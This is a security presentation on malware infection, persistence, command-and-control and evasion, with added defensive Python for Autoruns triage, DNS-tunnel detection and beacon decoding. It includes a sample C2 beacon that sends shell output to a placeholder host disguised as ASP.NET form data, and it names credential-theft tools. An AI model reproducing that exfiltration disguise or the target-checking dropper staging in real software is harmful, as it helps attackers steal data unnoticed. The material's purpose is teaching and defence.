ECrime presentation - A few bits about malware
A few bits about Malware
A story about trojan horses and RATs.
$ whoami
• Michael Hendrickx
• Senior Security Analyst @ HelpAG
• Vulnerability Assessments
• Social Engineering
• Presentations
• Created new undetected* RAT for the company
• Belgian
* Until now
Malware attacks: a real threat
• Malware has caused a lot of damage
• Many names: RATs, viruses, trojans, rootkits, ransomware, …
• Examples: Cryptolocker, Zeus, BlackEnergy, …
• Targets different platforms:
  • Browsers
  • Smartphones
  • PCs
Malware attacks: stages
• Malware attacks come in 2 stages
• Stage 1, Infection: exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …
• Stage 2, Persistence: AV evasion, persistence, looting, CNC connectivity, lateral movement
“you’re in trouble”
Malware attacks: infection
• Stage 1: modes of infection
  • Exploited software bugs
  • (Spear) phishing
  • Waterhole attack
  • Malicious USB
Malware attacks: infection
• Exploited software bugs
• Attacker hacks into a vulnerable service
• Could be anything:
  • SQL injection on a website leads to code execution
  • Poorly implemented upload functionality
  • Unpatched server software
  • Man in the Middle
  • Weak passwords
  • …
Malware attacks: infection
• Spear phishing
• Very specific message to a single or very few victims
• Carries a malicious payload: macro, PDF, renamed files, trojaned archives, …
• Or links to a malicious file: nothing is attached to the mail, so the file has to be downloaded by the victim and the mail-gateway AV never gets to scan it.
Malware attacks: infection
• Waterhole attack
• Indirect targeted attack
• Attacker compromises sites that the victim probably visits
• Exploits an outdated browser or plugins
• Forces install of malware:
  “your Flash Player is outdated”, “you should update Java”
Malware attacks: infection
• Evil USB dongle
• A USB peripheral can be anything:
  • USB hard drive / dongle
  • Keyboard, WiFi / network adapter, microphone, …
  • Hub with any of the above
• Example: USB Rubber Ducky
  • Looks like a dongle, is a keyboard
  • Types 1000 words per minute
  • Is only 30 USD
Malware attacks: stages
• On to stage 2:
• Stage 1, Infection: exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …
• Stage 2, Persistence: AV evasion, persistence, looting, CNC connectivity, lateral movement
Malware attacks: persistence
• Stage 2: Persistence
• Execution persistence: ensure that our malware keeps on running
• CnC connectivity: listen for commands
• AV evasion / hiding: prevent the malware from being detected and removed
• Lateral movement: infect more machines
Malware attacks: Execution persistence
• Ensure malware keeps on running
• Startup folder
• Registry keys (e.g. the Run / RunOnce keys)
• Automatic services
• Browser plugins / helper objects: you’re re-infected whenever the browser is opened
• Infected document templates: every time a Word/PowerPoint/Excel file is opened or created, you’re re-infected
Use Microsoft’s Autoruns to list everything that starts at boot or logon, including all of the locations above (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx).
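Autoruns lists hundreds of legitimate entries per machine, so the useful step is triaging its export against the persistence locations on this slide. The script below is an added example, not code from the presentation or from Sysinternals: it reads a CSV in the shape produced by `autorunsc.exe -c` (the column names are an assumption modelled on that format; check them against your own export), and flags enabled entries whose image has no verified signature and additionally lives in a user-writable directory, masquerades as a Windows system binary, or is an Office template/add-in that auto-loads. The sample rows are constructed placeholders.

```python
"""Triage an Autoruns CSV export for the persistence locations on the slide.

Added example (not from the presentation). Column names are assumed to
follow `autorunsc.exe -c` output; sample data below is constructed.
"""
import csv
import io
import re
from typing import Dict, List

# Constructed sample export: placeholder paths and names chosen to
# exercise each rule below. Not a real machine.
SAMPLE_CSV = r"""Entry Location,Entry,Enabled,Category,Signer,Image Path,Launch String
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,(Verified) Microsoft Windows,c:\windows\system32\securityhealthsystray.exe,%windir%\system32\SecurityHealthSystray.exe
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,OneDriveUpd,enabled,Logon,(Not verified) Contoso Ltd,c:\users\alice\appdata\roaming\svchost.exe,c:\users\alice\appdata\roaming\svchost.exe -k netsvcs
C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup,update.lnk,enabled,Logon,,c:\users\public\update.exe,c:\users\public\update.exe
HKLM\System\CurrentControlSet\Services,WinUpdSvc,enabled,Services,,c:\programdata\winupd\winupd.exe,c:\programdata\winupd\winupd.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects,{00000000-0000-0000-0000-000000000000},enabled,Explorer,(Verified) Adobe Inc.,c:\program files\common files\adobe\acrobat\activex\acroiehelper.dll,
C:\Users\alice\AppData\Roaming\Microsoft\Word\STARTUP,helper.dotm,enabled,Office Addins,,c:\users\alice\appdata\roaming\microsoft\word\startup\helper.dotm,
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,OldAgent,disabled,Logon,,c:\users\public\agent.exe,c:\users\public\agent.exe
"""

# Names an implant likes to borrow; legitimate copies live under C:\Windows.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe"}
# Office auto-loading template / add-in extensions.
OFFICE_TEMPLATE_EXT = (".dotm", ".dotx", ".xlam", ".xla", ".ppam")
# Directories a normal user (or a dropper running as that user) can write to.
USER_WRITABLE = re.compile(r"^[a-z]:\\(users|programdata|windows\\temp)\\")


def triage_autoruns(csv_text: str) -> List[Dict[str, object]]:
    """Return the enabled entries that deserve a closer look, with reasons."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Enabled"].strip().lower() != "enabled":
            continue                                  # disabled entries do not run
        location = row["Entry Location"].strip().lower()
        path = row["Image Path"].strip().lower()
        signed = row["Signer"].strip().startswith("(Verified)")
        reasons = []
        if not signed:
            reasons.append("no verified signature")
        if USER_WRITABLE.match(path):
            reasons.append("image in user-writable path")
        basename = path.rsplit("\\", 1)[-1]
        if basename in SYSTEM_NAMES and not path.startswith("c:\\windows\\"):
            reasons.append(f"{basename} outside C:\\Windows (masquerade)")
        if path.endswith(OFFICE_TEMPLATE_EXT) or "\\word\\startup" in location:
            reasons.append("Office template / add-in auto-loads on every document")
        # An unsigned image on its own is common on real fleets; require
        # at least one further oddity before raising it.
        if not signed and len(reasons) >= 2:
            findings.append({"entry": row["Entry"], "location": row["Entry Location"],
                             "image": row["Image Path"], "reasons": reasons})
    return findings


def flagged_entries(csv_text: str) -> List[str]:
    """Just the entry names, in export order."""
    return [f["entry"] for f in triage_autoruns(csv_text)]


if __name__ == "__main__":
    for f in triage_autoruns(SAMPLE_CSV):
        print(f"{f['entry']:<14} {f['location']}")
        print(f"    {f['image']}")
        print("    " + "; ".join(f["reasons"]))
```

Run against a real export (`autorunsc.exe -a * -c -h -s -v > autoruns.csv`) the same rules surface the Run-key entry pointing into AppData, the Startup-folder shortcut, the service under ProgramData and the Word STARTUP template, while leaving the signed Microsoft and Adobe entries alone; the signed Adobe BHO is exactly the kind of browser helper object that would be worth a second look if its signer were missing.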
Malware attacks: CnC connectivity
• Direct traffic: probably (hopefully) detected and blocked
• HTTP tunnel: may get detected by L7 firewalls; “deep packet inspection” is pretty shallow
• HTTPS: difficult to see what’s happening, unless you MITM it
• DNS tunneling: the queries usually get “proxied” by your own resolver to the attacker’s DNS server; do you monitor anomalies?
• Peer-to-peer WiFi network: “Hi, I’m an ad-hoc WiFi network”, reaches up to 10 to 20 meters
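The DNS bullet ends with a question, so here is one answer to it: an added example (not from the presentation) that scores a resolver query log per registered domain on the signals a tunnel cannot avoid producing, namely many distinct, long, high-entropy subdomains and a preference for record types that carry data downstream. The log format (`<client> <qtype> <qname>`) and the tunnel domain under the reserved `.example` TLD are constructed; taking the last two labels as the registered domain is a simplification a real deployment would replace with the public suffix list.

```python
"""Spot DNS tunnelling in a resolver query log.

Added example (not from the presentation). Log format and sample lines
are constructed; the thresholds are this example's own starting values.
"""
import math
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample: five ordinary lookups and six queries to a
# placeholder tunnel domain. Each tunnel label encodes a chunk of data.
SAMPLE_LOG = """\
10.0.0.5 A www.microsoft.com
10.0.0.5 A update.microsoft.com
10.0.0.5 A login.microsoftonline.com
10.0.0.5 A mail.google.com
10.0.0.5 A www.google.com
10.0.0.7 TXT a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6.s01.tunnel.example
10.0.0.7 TXT q7r8s9t0u1v2w3x4y5z6a7b8c9d0e1f2.s02.tunnel.example
10.0.0.7 TXT k3l4m5n6o7p8q9r0s1t2u3v4w5x6y7z8.s03.tunnel.example
10.0.0.7 TXT c9d0e1f2g3h4i5j6k7l8m9n0o1p2q3r4.s04.tunnel.example
10.0.0.7 TXT w5x6y7z8a9b0c1d2e3f4g5h6i7j8k9l0.s05.tunnel.example
10.0.0.7 TXT e1f2g3h4i5j6k7l8m9n0o1p2q3r4s5t6.s06.tunnel.example
"""

MIN_UNIQUE = 5       # distinct subdomains seen under one registered domain
MIN_LENGTH = 24      # mean subdomain length in characters, dots removed
MIN_ENTROPY = 3.5    # mean Shannon entropy of the subdomain, bits per character
DATA_QTYPES = {"TXT", "NULL", "CNAME", "MX"}   # types tunnels use to push data down


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's own symbol distribution."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Simplification: last two labels (real code would use the public suffix list)."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def domain_stats(log_text: str) -> Dict[str, dict]:
    """Aggregate per registered domain: query count, unique subdomains, length, entropy."""
    per_domain = defaultdict(lambda: {"subdomains": set(), "queries": 0, "data_qtypes": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue                                  # skip malformed lines
        _client, qtype, qname = parts
        dom = registered_domain(qname)
        sub = qname.lower()[: -len(dom)].rstrip(".")
        st = per_domain[dom]
        st["queries"] += 1
        st["subdomains"].add(sub)
        if qtype.upper() in DATA_QTYPES:
            st["data_qtypes"] += 1
    out = {}
    for dom, st in per_domain.items():
        subs = [s.replace(".", "") for s in st["subdomains"]]
        out[dom] = {
            "queries": st["queries"],
            "unique": len(subs),
            "mean_len": sum(map(len, subs)) / len(subs),
            "mean_entropy": sum(map(shannon_entropy, subs)) / len(subs),
            "data_ratio": st["data_qtypes"] / st["queries"],
        }
    return out


def flag_tunnels(log_text: str) -> List[Tuple[str, List[str]]]:
    """Domains that trip at least two independent tunnel signals."""
    flagged = []
    for dom, st in domain_stats(log_text).items():
        reasons = []
        if st["unique"] >= MIN_UNIQUE and st["mean_len"] >= MIN_LENGTH:
            reasons.append(f"{st['unique']} unique subdomains, mean length {st['mean_len']:.0f}")
        if st["mean_entropy"] >= MIN_ENTROPY:
            reasons.append(f"mean subdomain entropy {st['mean_entropy']:.2f} bits/char")
        if st["data_ratio"] >= 0.5:
            reasons.append(f"{st['data_ratio']:.0%} of queries are TXT/NULL/CNAME/MX")
        # Any single signal has benign explanations (CDN hostnames, SPF
        # lookups, hashed cache-busters); require two to cut the noise.
        if len(reasons) >= 2:
            flagged.append((dom, reasons))
    return flagged


if __name__ == "__main__":
    for dom, reasons in flag_tunnels(SAMPLE_LOG):
        print(f"{dom}: " + "; ".join(reasons))
```

Counting per registered domain rather than per query is what makes the resolver's “proxying” behaviour visible: the recursive resolver answers nothing from cache because every subdomain is new, and that stream of cache misses to one domain is the anomaly.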
Malware attacks: hagrat CnC
• Encode / Encrypt / Obfuscate traffic
• Example beacon: looks like an ASP.NET postback, but the __VIEWSTATE value is plain base64 of the command output

POST /css/cc.aspx HTTP/1.1
Accept: text/html;q=0.8,application/xml,*/*
Accept-Language: en-gb;q=0.8,en
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: www.thisisafakedomain.com
Content-Length: 277
Connection: Keep-Alive

__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWNyb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdWQ+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;.

Decoded __VIEWSTATE value (sequence number, colon, output):
1:Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\hendrickx\ownCloud>dir c:/
Invalid switch - "".

C:\Users\hendrickx\ownCloud>
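The beacon above only survives “deep packet inspection” because nobody decodes the field; doing so is a two-line job. The following is an added example, not the RAT's code or anything from the presentation: it takes the POST body exactly as printed on the slide, strips the `;;.` terminator, restores the base64 padding the implant drops, and splits off the leading sequence number. The printable-ratio threshold and the cmd.exe prompt regex used to decide whether a decoded blob is shell output are this example's own heuristics.

```python
"""Decode the hagrat HTTP beacon body from the slide.

Added example (not from the presentation). The body string is copied
verbatim from the slide; the detection heuristic is this example's own.
"""
import base64
import re
import string
from typing import Tuple
from urllib.parse import unquote

# The request body shown on the slide (Content-Length: 277).
BEACON_BODY = "__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWNyb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdWQ+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;."

# Matches a cmd.exe prompt such as "C:\Users\x>" at the start of a line.
PROMPT = re.compile(r"^[A-Za-z]:\\[^\r\n]*>", re.M)


def decode_beacon(body: str) -> Tuple[int, str]:
    """Split the form body, strip the ';;.' terminator, re-pad and base64-decode.

    Returns (sequence number, command output). Raises on a body that is
    not the single __VIEWSTATE field the implant sends.
    """
    name, _, value = body.partition("=")
    if name != "__VIEWSTATE":
        raise ValueError(f"unexpected field {name!r}")
    value = unquote(value)                 # undo %2B / %2F if the client encoded them
    if value.endswith(";;."):
        value = value[:-3]
    value += "=" * (-len(value) % 4)       # the implant drops the base64 padding
    raw = base64.b64decode(value)
    seq, _, text = raw.decode("utf-8", errors="replace").partition(":")
    return int(seq), text


def looks_like_shell_output(text: str) -> bool:
    """Heuristic: mostly printable text containing a cmd.exe prompt or banner."""
    if not text:
        return False
    printable = sum(ch in string.printable for ch in text) / len(text)
    return printable >= 0.95 and (
        PROMPT.search(text) is not None or "Microsoft Windows [Version" in text
    )


if __name__ == "__main__":
    seq, text = decode_beacon(BEACON_BODY)
    print(f"sequence {seq}, shell output: {looks_like_shell_output(text)}")
    print(text)
```

A genuine ASP.NET `__VIEWSTATE` is also base64, which is the whole point of the disguise; the difference is that it decodes to a serialised object graph (and, with MAC validation on, ends in an HMAC), not to a Windows banner and a prompt. Running this decoder over captured form posts to unfamiliar hosts is a cheap check that the “pretty shallow” inspection on the slide does not perform.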
Malware attacks: hiding
• Hiding
• Download multiple stages:
  Dropper → Malicious payload (real virus) → Infect victim
  Dropper first asks: Can I reach the Internet? Does the payload get detected?
Malware attacks: hiding
• Multi-stage download ensures the correct victim
  Dropper → CnC: Can I reach the Internet?
  CnC: “This is not the IP / company / country I’m targeting” → serves an innocent payload
  CnC: “Bingo!” → serves the malicious payload (real virus) → infect victim
  Dropper: “Cool, I’ll install it”
• Consequence for analysts: a sandbox that detonates the dropper from an address outside the targeted range only ever receives the innocent payload, so the dropper looks clean.
Malware attacks: lateral movement
• Exfiltration of information
  • Documents (%userprofile%\documents)
  • Passwords (mimikatz, LaZagne)
  • Browser history
  • Emails, files, …
• Recon / infect the network
  • Ping other machines
  • File shares
  • (SharePoint) portals
Remediation
• Human factor: don’t get infected
  • Social engineering exercises
  • Awareness
  • Alerting IT security (“Support, I think I did something wrong”)
• Technical factor: prevent, detect, destroy
  • Tight controls on endpoints
  • Monitor inbound programs (attachments, downloads, …)
  • Monitor network usage: DNS anomalies, unidentified protocols, …
  • Regular scanning with AV, IOC detectors, … such as Loki (https://github.com/Neo23x0/Loki)
Thank you!
Questions?
Don’t accept any USB dongles from me!
CONTACT US | WWW.HELPAG.COM | [email protected]
DUBAI, UAE: ARJAAN OFFICE TOWER, OFFICE 1201 / 1208, PO BOX 500741, T +971 4 440 5666, F +971 4 363 6742
ABU DHABI, UAE: SALAM HQ BLDG, BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195, T +971 2 644 3398, F +971 2 639 1155
DOHA, QATAR: AL DAFNA – PALM TOWER, OFFICE 4803, WEST BAY, P.O. BOX 31316, T +974 4432 8067, F +974 4432 8069